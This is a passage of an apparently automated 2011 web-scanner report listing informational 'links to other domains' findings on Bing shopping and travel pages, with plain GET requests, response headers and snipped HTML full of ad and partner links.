<a href="/shopping/plus-size-sonatina-1-piece-swimsuit/p/7D38651683E384E65002?q=plus-size+swimwear&amp;FORM=EGCA11" onmousedown="return si_T('&amp;ID=commerce,96.1',this)"><img src="http://a3.bing4.com/getimage?q=big-9CB99148EEEF086148EF91B32A1F6280&amp;wf=Comimage" title="Plus Size Sonatina 1 Piece Swimsuit" alt="Plus Size Sonatina 1 Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-sanibel-1-piece-swimsuit/p/DCC0BBD40DC4DF275002?q=plus-size+swimwear&amp;FORM=EGCA12" onmousedown="return si_T('&amp;ID=commerce,99.1',this)"><img src="http://a4.bing4.com/getimage?q=big-2DFDFDBEB043D0492840EF6DF43E1EA7&amp;wf=Comimage" title="Plus Size Sanibel 1 Piece Swimsuit" alt="Plus Size Sanibel 1 Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-oceanus-1-piece-swimsuit/p/304DCAB3ADE8D7F35002?q=plus-size+swimwear&amp;FORM=EGCA13" onmousedown="return si_T('&amp;ID=commerce,102.1',this)"><img src="http://a1.bing4.com/getimage?q=big-C45C11A2B91B55B1A82BBE7432A13894&amp;wf=Comimage" title="Plus Size Oceanus 1 Piece Swimsuit" alt="Plus Size Oceanus 1 Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
<a href="/shopping/plus-size-pandora-1-piece-swimsuit/p/5B8371B726F8533C5002?q=plus-size+swimwear&amp;FORM=EGCA14" onmousedown="return si_T('&amp;ID=commerce,105.1',this)"><img src="http://a2.bing4.com/getimage?q=big-FC0B0841983CF3CC15A5DF90F4A5621E&amp;wf=Comimage" title="Plus Size Pandora 1 Piece Swimsuit" alt="Plus Size Pandora 1 Piece Swimsuit" width="125" height="125" style="margin-top:20px;" /></a>
...[SNIP]...
9tvoGayyT3&amp;cbst=1.3&amp;msclkid=87F15C961AE14766AA22D58F41A70DA3&amp;c=683860&amp;mu=http%3a%2f%2fbodybody.com%2fujena-swim-wear-p246.html" onmousedown="return si_T('&amp;ID=commerce,108.1',this)"><img src="http://a3.bing4.com/thumb/get?bid=l47sO3W5tJeqgg&amp;bn=CC&amp;fbid=95xJb3S%2fWTcG0A&amp;fbn=CC" title="Grape Smoothie Bottom Only" alt="Grape Smoothie Bottom Only" width="96" height="160" style="margin-top:2px;" /></a>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vu85eu905PJ8IGj8f18cMPcRHoyjJ4PcZUArX5etc6c8OizOmc0y5zDz9Mo1rAD8tKD2udvvoGcIgwXcGmftPNoYqFn9sWvE0BQFLG3EQ76hWVWckocCqYv2uqNHclVmztEiPRNQ4sdc3kvjbf5aOqa4rgB_ba1-8r-2NErElWVoCfLI74iv8rSxr-It2tcq0qD5yw6mM2IwYAMPE_mYlaLSZ64ey4k1qHlKwonu0VdHAKjbH3X6mAEpyIjcVDkj5WTIacwVRSGB5VKfMg4ZQt28-bxyWOONDT09E9NhSoR3jcrBFp_n_V_pOLeJJgHv9pSg_aQSSAamz7SJUPZBQ8UjRRb9Hkx-ORcO3wjhjUwgruDkgxE4TEN3TQ6sbIWLEHloSlB_COahn9X7HyDfP8BkIplfGzDVV-p4kgwannmzGLWRJaYKe0pswnlwB8iF8NVQJTDCYmOwJ6m9TaDyIiiQ8wj4QJmNzPdHEUGtSkhUn5rE5kOfuWL1fvNm7bcphknpkI012vWJB" onmousedown="return si_T('&amp;ID=FD,58.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4v53yHYora9j9GPi_3uhmV8QVBwlgdIV5iaUs78_1NhMCwR1ejPoMn77KvCYW8NnC0efTKPDx7PQiO6ZLTjIR9kLSpsBzhV5mE1Nqf-1qgAMSS6GSWmdOGH_YbA_HhNj7H23Q2IJKo_8E19a0viPUafR8-nGjnW4b67cOWljDoZe4SOp4i79822pA_CkZUswEq8ohaxbI61N0329fv-_YqKTvIa20TVb3EJoz1ZpKiPeMP8DOGNu4_CjTtv5OOTwhZcRTmMfd7XXe5wYngcDEP4eDSm-s5Q1jzufS8rIj_5QH-n_fZIlTPFdseIvdd1Jd0y2-NgihpEzioDOcZSZHnUqqJ8JBDhXu0LmX6msrm0nShfiJLzzONmEdDz3SOXTj22-8wttWjNad_9Bfdb_IbS9DZvPlO0wkyL9aUNAC-6p41VAlM6MyvSvFLIvZLuYrrHWLKDhAmY3M9Xl6OmUn7J0R3o2sCoMUPZVS_s7siGxAU4J_Tm7BbLPo" onmousedown="return si_T('&amp;ID=FD,60.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vOJQ2dFie1YmD4SYvLn2_M1O_l9EQEOrzExK8-mlXbT075AMwPEj2ORymlISHwrx-GSRCKOQU4xMOlNw9JuR9cJXGcZqaAAP5l-7jBijYfsuEzLFjpyfEHLfwWi7r_jRuZhaL7TmFMrRvQTDnAIHWPeZxO_VN6wPQ6sLbTVINsNKRJARvq8o5_GQhQS6bI5l2apTwTrzU5Pxyz-g2zXT904oY3GftZQUAECKGF84pohT2S-1xfk0zZll6tPoE73f_hvEjTgtn5e46zDzC5UPbaV6czDPEiXTUIuJd2wsac8VgeuxzJWQHvbRQo-LJmj2XBCXE5Ak4lAVW-Dr1YGN0gxW0FIUcMMrmSpc6pfRbO4W6b__FL5EtfrYA730vVjJbLsD4e-A2MUH3ryG6YhTHHTVUCUxFyoSb2g0wepjhTCZduA3pECZjcz2LrvGZtGHExUlH3D-gFiWNfcaudMe7IlKbKqT7h3uVyQ" onmousedown="return si_T('&amp;ID=FD,62.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4v6vCgk3oCadYGZ8YMoFsGfUJbcaeYKK3JfqnWqBzm4KLzpbs2nS6_R_GDQzkRRzpuuKvzqZSceoWEu44I0oSxVBvunwRqcVyh5_o2CBOyFfH5hED0k78jJF5KY00AiuiIM_6V5f9-HcIqSck4o5iadV81xlc22MTumrhxGzTtLqggh9Lv0uuNmCvGOyLSJtKEdJjOzlUpJ0puN6LopqPyHyOZ3CZQGHa9liyMDIr69xrQxTz9mbB3Ohx5GOnTEArNCoLhia1ozgqJLYuwAFiE1zVUCUzxPTnNhqfija63S9XifJXTECZjcz2cDOKdos2tymhO5OQ3ifMBKhsCNO1iu8ap50Uw6qH0QA" onmousedown="return si_T('&amp;ID=FD,64.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://893563.r.msn.com/?ld=4vOaWSnhW_2FnMxyxGtXj8lsMGpqD-gKGjaw0PTnOaNYo1VkkpO9oBWiftFOYzwF5Zyu7Mffp1tEsXnV4rRNyvZYr31Spp7RePYqFNyPe2Q-6G4HMLtnPa7_H8SYDSJrCK39bQ8BfIwaJsR8DOQbwiOmoqI6BUX5eYKD4sB77fhoMKM9vcdkiX0deUl7hetbhEGRgwp8_iMxv6R7og27-eNaz3s_-cd61_arIin7k1nqq0lukstjU6-wc-S28I7gNiVHkENAJvjFF90gOoA_0E3jVUCUy1ntsGh6vI1O84-BAWmgifECZjcz3411hJjFi2EIZQCrbNjlBTHesNk6_HQOa8LZnjQ5-FnQ" onmousedown="return si_T('&amp;ID=FD,66.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vLNHuap9D4Yv5RRrX3KJUosXUKHrN3h7f_1Pz3oGM729SxfQheaR3mYCivzqfjAs45m-hCR_1m_75t_v8eBodyivV2yW73YltdRSSrBbYsUA9AwiDXO9VhFh43fGImo32_d40mgGwtrq_50g9r7oy72tLF8vnb3bniP1duoUYFllI9R_c2br6M7SZ0nzDELIR2CZi8F2y6RFQoqxnrsR70INwlnUxWwpQCihI4QsiBPfv-eIdlFq9Vfzk1nU1pM5pqlZ5pOomiL5vfVoyACnKbTFBYU4y1CUCN1Sb8ilgvnsXH5F02NHoiUnlrknGOKBbQPVFLJy3TZ7AxPO9WNxW5DVUCUx2Zm3k2cp94p6S9yaQ40b_ECZjcz2OsNdR8CJL1_f60Ftgo8M6e3ntBHjU2jCoBSkkGc5z4w" onmousedown="return si_T('&amp;ID=FD,68.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://0.r.redacted/?ld=4vx6-Gyx8_37lrqotWhsnakfUmnda0sYFaEoOtH75yFfxs_FzHf80HSWSsx6nAR7Mtr6uXXEmXW5qN0QXNLqLihNxG0jgCWKCi8-j8C1outxDHa_OVWjFjMEkJvIPVz18vZ9osxY4I8Kc7yqA9S3Iiswpp-mqK4Ag-ifWFR9T0fd3BaIIBKz8Y8VBxC-J7Zt8KRcZaIoDYk7zqqwws4D-9Efegh664_f-WFEhENJquZQcI54X55x_jIroWY9uOto1Q2FBpWqFT3UwwlGBdkTXAtPzt-_qEpMAn5PcA2rBuCJXyCr1VPtPrFvt6DLRT33kcjvNoKYVDoUaVOtEQD7_kQGCREEpx5-qv5jL5_Agn2lmcX9NSEdjATgnz3d39VH2Ces8NLWGIpNO64t4kgs0IxTVUCUyJkk1DniG_6utZtYbOu8ZjECZjcz2HE_FnGmqSNZI1_1f5ZfotTMwiLIcBdP8Tkko-alW9ag" onmousedown="return si_T('&amp;ID=FD,70.1,Ads')"><strong>
...[SNIP]...
<h3><a href="http://822761.r.msn.com/?ld=4vAbsQiNPDVwdmk5aizBmpT2hjeZnYkfnymGjYkISYz5qGIWT7osk058ydRjVfJ1NEJ8u2aa5My1ChOtz63x7xiSAmnSBaIqINzJlFI_n-wj6j2KKF6m85FO-JXfLSI74sIVLMbbjyvP0BPG3WQkarzspCpNfkA0YyvaX24iralxQ_DGlxIIgYJdKjCflF-BddicrAEhLnjyZ3uBG-NTOkdzVUCUzctsPy20DUwFXfY2iRUlWWECZjcz3YdPr5QRRwPhpbgEA_Ard3hBx52CKS6ATYEC0rh0j6Yg" onmousedown="return si_T('&amp;ID=FD,72.1,Ads')">Tankini <strong>
...[SNIP]...
<h3><a href="http://6766.r.msn.com/?ld=4v1V6riJb29HvWXV4XOgZVTH2REZ3jVeqkWB1JkqpGivjz4O0BZhMK74AmJES9_Gwkvo0bUdsxa3CyaRlxmifg0kaDqfks0F5R3AfPwoDM19xVAfJwMqiPgsyoJydWLg4RjkN3pSXRVwFAu5Kmopc2ZcCD_vpjDwHbjC_I6snCrWp0COogel0wycHFQ4EMgywvNhETFE-YMZHUKqeY1l1KHKoJkZrkRVJnO0ktPA8av-_aTEdrD3rZBF_1nLJyTMR9tjNi92Y6wJkColk1bx0go93Sna9Ij0ymoLjIWbVUKkU1VAlMOgKthCX7UakSrubcshsBLBAmY3M9qN-wBk-aw80zCLIUw8KPdmuw-0s_z08x8wMO-7z24yQ" onmousedown="return si_T('&amp;ID=FD,74.1,Ads')"><strong>
...[SNIP]...
<div><a href="http://advertising.microsoft.com/search/" class="sb_adMktA" onmousedown="return si_T('&amp;ID=FD,56.1,Ads')">See your message here</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,239.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,241.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,243.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,245.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,247.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808574.aspx?scrx=1&amp;market=en-US" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,249.1')">Help</a> | </li><li><a href="https://feedback.discoverbing.com/default.aspx?locale=en-US&amp;productkey=bingshopping&amp;P1=dsatcommerce&amp;P2=plus-size%20swimwear&amp;P3=0&amp;P4=SHOPH1&amp;P5=f741a5d3-c854-4f77-a0b5-7d8439e7e06e&amp;P6=&amp;P7=Original&amp;P8=&amp;P9=0.0/0.0&amp;P10=0.0&amp;P11=http%3a%2f%2fwww.bing.com%3a80%2fshopping%2fswimwear%2fc%2f4503%3fq%3dplus-size%2bswimwear%26FORM%3dSHOPH1%26crea%3d012911swimwear&amp;P12=&amp;searchtype=Commerce+Answer&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%2fshopping%2fswimwear%2fc%2f4503%3fq%3dplus-size%2520swimwear%26FORM%3dFEEDTU" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,251.1')">Tell us what you think</a>
...[SNIP]...

22.393. http://www.bing.com/travel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel/?cid=msn_nav_lifestyle&FORM=MSNNAV HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 80669
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:07:53 GMT
Connection: close
Set-Cookie: lbc=812; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z7vsg9a6jq3f3uyz4cnhuieam4ulo_VID-4gvhc6ts2kj4myz6buj3ufvs84q5_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:07:52 GMT; Path=/travel
Set-Cookie: JSESSIONID=5CD7FF5F8D311758E2B9C1555DFBD530; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=41B19621CE894C38863D5EE299D59212; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:07:52 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2f0a19890f3a47f2ba784890d09571ca; expires=Tue, 29-Jan-2013 17:07:52 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621027&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:07:53 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,79.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,81.1')">Hotmail</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236123;36139234;u?http://www.orbitz.com/App/DisplayCarSearch?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cars" target="_cars" class="FCEVENT_track_DOBUBBLE_BookingModule-link1">Cars</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236160;36139297;e?http://cruises.orbitz.com?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=cruises" target="_cruises" class="FCEVENT_track_DOBUBBLE_BookingModule-link2">Cruises</a>
...[SNIP]...
<li>
                                    <a rel="nofollow" href="http://ad.doubleclick.net/clk;214236226;36139480;b?http://www.orbitz.com/App/PrepareVacationsHome?gcid=C11287x798&WT.mc_id=o_bing_msntravel&WT.mc_ev=click&DCSext.mc_kw=vacations" target="_vacations" class="FCEVENT_track_DOBUBBLE_BookingModule-link3">Vacations</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http&#58;&#47;&#47;ad.doubleclick.net&#47;clk&#59;201900517&#59;26579808&#59;j&#63;http&#58;&#47;&#47;www.orbitz.com&#47;App&#47;PerformMDLPDealsContent&#63;deal_id&#61;ski&#38;cnt&#61;PKH&#38;gcid&#61;C11287x798&#38;WT.mc_id&#61;o_bing_msntravel&#38;WT.mc_ev&#61;click&#38;DCSext.mc_kw&#61;ski" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link1">Save up to 40% on ski packages</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http&#58;&#47;&#47;ad.doubleclick.net&#47;clk&#59;201900522&#59;26579808&#59;f&#63;http&#58;&#47;&#47;www.orbitz.com&#47;App&#47;PerformMDLPDealsContent&#63;deal_id&#61;HI&#38;cnt&#61;PRO" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link2">Great deals to Hawaii</a>
...[SNIP]...
<li>
       <a rel="nofollow" target="_blank" href="http&#58;&#47;&#47;ad.doubleclick.net&#47;clk&#59;201900522&#59;26579808&#59;f&#63;http&#58;&#47;&#47;www.orbitz.com&#47;App&#47;PerformMDLPDealsContent&#63;deal_id&#61;vacation-rentals&#38;gcid&#61;C11287x798&#38;WT.mc_id&#61;o_bing_msntravel&#38;WT.mc_ev&#61;click&#38;DCSext.mc_kw&#61;rentals" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link3">Find the perfect vacation rental</a>
...[SNIP]...
<li class="more deals">
       <a rel="nofollow" target="_blank" href="http&#58;&#47;&#47;ad.doubleclick.net&#47;clk&#59;201900520&#59;26579808&#59;d&#63;http&#58;&#47;&#47;www.orbitz.com&#47;App&#47;PrepareDealsHome&#63;gcid&#61;C11287x798&#38;WT.mc_id&#61;o_bing_msntravel&#38;WT.mc_ev&#61;click&#38;DCSext.mc_kw&#61;dealspage" class="FCEVENT_track_DOBUBBLE_PartnerDeals-link4">More top deals by <img src="images/orbitzLogoSmall.gif">
...[SNIP]...
<li>
       <a rel="nofollow" href="http&#58;&#47;&#47;twitter.com&#47;fareologist" class="FCEVENT_track_DOBUBBLE_Tools-link1">Bing travel on Twitter</a>
...[SNIP]...
<li>
       <a rel="nofollow" href="http&#58;&#47;&#47;www.facebook.com&#47;Bing&#63;v&#61;app_131774473518765" class="FCEVENT_track_DOBUBBLE_Tools-link2">Bing travel on Facebook</a>
...[SNIP]...
<li>
       <a rel="nofollow" href="http&#58;&#47;&#47;redacted&#47;investor&#47;market&#47;currencyconverter.aspx" class="FCEVENT_track_DOBUBBLE_Tools-link5">Currency converter</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,92.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,94.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,96.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,98.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,100.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,102.1')">Help</a>
...[SNIP]...

22.394. http://www.bing.com/travel/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel/content/search?q=Coolest+Small+Towns%3a+Ely%2c+Minn.+(population+3%2c470)&cid=msn1162079&FORM=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 46219
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:06 GMT
Connection: close
Set-Cookie: JSESSIONID=5831CBDBB8382C06716441670216A316; Path=/travel
Set-Cookie: _SS=SID=AD194B1D8163435D90F9C42BAACCA3C7; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2b67e617c3464e858cbe39668b3c119f; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:06 GMT; domain=.bing.com; path=/


                                                                                                                                   
...[SNIP]...
</script>
   
       
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,71.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,73.1')">Hotmail</a>
...[SNIP]...
<br/>
<a xmlns="" tabindex="20" href="http://www.discoverbing.com/get/set-bing-as-your-homepage-2">
<strong xmlns="http://www.w3.org/1999/xhtml">
...[SNIP]...
</div>

                   
                                                                                            <iframe src="http://www.facebook.com/plugins/like.php?href=http&#58;&#47;&#47;www.bing.com&#47;travel&#47;content&#47;search&#63;q&#61;Coolest&#43;Small&#43;Towns&#37;3a&#43;Ely&#37;2c&#43;Minn.&#43;&#40;population&#43;3&#37;2c470&#41;&amp;layout=standard&amp;show_faces=false&amp;width=250&amp;action=like&amp;colorscheme=dark&amp;height=35" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:35px;" allowTransparency="true"></iframe>
...[SNIP]...
<div class="attribution">
           
       
                <a href="http://www.budgettravel.com" tabindex="60">
                   <img src="http&#58;&#47;&#47;www.bing.com&#47;travel&#47;&#47;content&#47;static&#47;br-images&#47;image-aHR0cDovL2JsdWJlZGJ1aWEwMTo4My9pL0Y0L0MwOUE0NzRBMjc4QjVCMEFDNjBDQjgwRjlDREU4LmdpZg.gif" a
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-srv/gallery/0906_HotelPools/index.html?jumpToPic=0">Budget Travel: The World&rsquo;s Most Amazing Hotel Pools </a>
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-srv/gallery/0908_WeirdestHotels/index.html?jumpToPic=0">Budget Travel: World&rsquo;s Weirdest Hotels</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.ely.org/">Ely, MN Chamber Of Commerce &ndash; Boundary Waters Canoe Area ...</a>
...[SNIP]...
</cite> &middot;
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4709092502668224&mkt=en-US&w=fc9a562c,f175cd72">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.discoverourtown.com/MN/Ely/Lodging-3459.html">Bed and Breakfast Ely MN Minnesota Hotels, Vacation Rentals ...</a>
...[SNIP]...
</cite> &middot;
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4789687561289752&mkt=en-US&w=6a939d85,c76c6c0c">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://grandelylodge.com/">Ely Minnesota Resorts Family Vacations Fishing &amp; Golf MN</a>
...[SNIP]...
</cite> &middot;
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=ely+minnesota+vacation&d=4905673155414425&mkt=en-US&w=b201eb24,83604eb8">Cached page</a>
...[SNIP]...
</script>

<script src="http://adsyndication.redacted/delivery/getads.js"
   type="text/javascript">

   
</script>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,84.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,86.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,88.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,90.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,92.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808483.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,94.1')">Help</a>
...[SNIP]...

22.395. http://www.bing.com/travel/content/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/content/search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel/content/search?q=37+Secrets+of+the+Caribbean&cid=msntab1172106&Form=TRVCON HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 42436
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:08:33 GMT
Connection: close
Set-Cookie: JSESSIONID=B12A2B796782B2243917D1037B967CBB; Path=/travel
Set-Cookie: _SS=SID=6003A84770B14256A16FA9049752AF35; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ced98565d99974968bdaf56380e0a3d40; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:33 GMT; domain=.bing.com; path=/


    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">

...[SNIP]...
</script>
   
       
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,57.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,59.1')">Hotmail</a>
...[SNIP]...
<strong>
<a xmlns="" tabindex="20" href="http://www.discoverbing.com/get/set-bing-as-your-homepage-1/?form=MFEHPG&publ=BINGCOM&crea=TEXT_MFEHPG_Defaults_TravelSlide_kk1001_1x1">Always find what you're looking for. Make Bing your homepage.</a>
...[SNIP]...
<div class="partnerLink">
<a href="http://www.budgettravel.com/bt-reg/PrepareNewReg.do?source=newsletter">Get travel deals and more from Budget Travel</a>
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-srv/gallery/1011_WinterBeachRetreats/index.html?jumpToPic=0">Budget Travel: America&rsquo;s 10 Best Winter Beach Retreats</a>
...[SNIP]...
<li>
<a tabindex="60" href="http://www.budgettravel.com/bt-dyn/content/article/2010/11/24/AR2010112403746.html">Budget Travel: Why Is the TSA Questioning Me?</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://www.alltraveltips.com/">Best Travel Tips, Travel Secrets Revealed</a>
...[SNIP]...
</cite> &middot;
                   <a tabindex="70" href="http://cc.bingj.com/cache.aspx?q=travel+tips&d=4703186920408955&mkt=en-US&w=786474fe,c4331006">Cached page</a>
...[SNIP]...
<h3>
<a tabindex="70" href="http://travel.state.gov/travel/tips/tips_1232.html">Tips for Traveling Abroad</a>
...[SNIP]...
</cite> &middot;
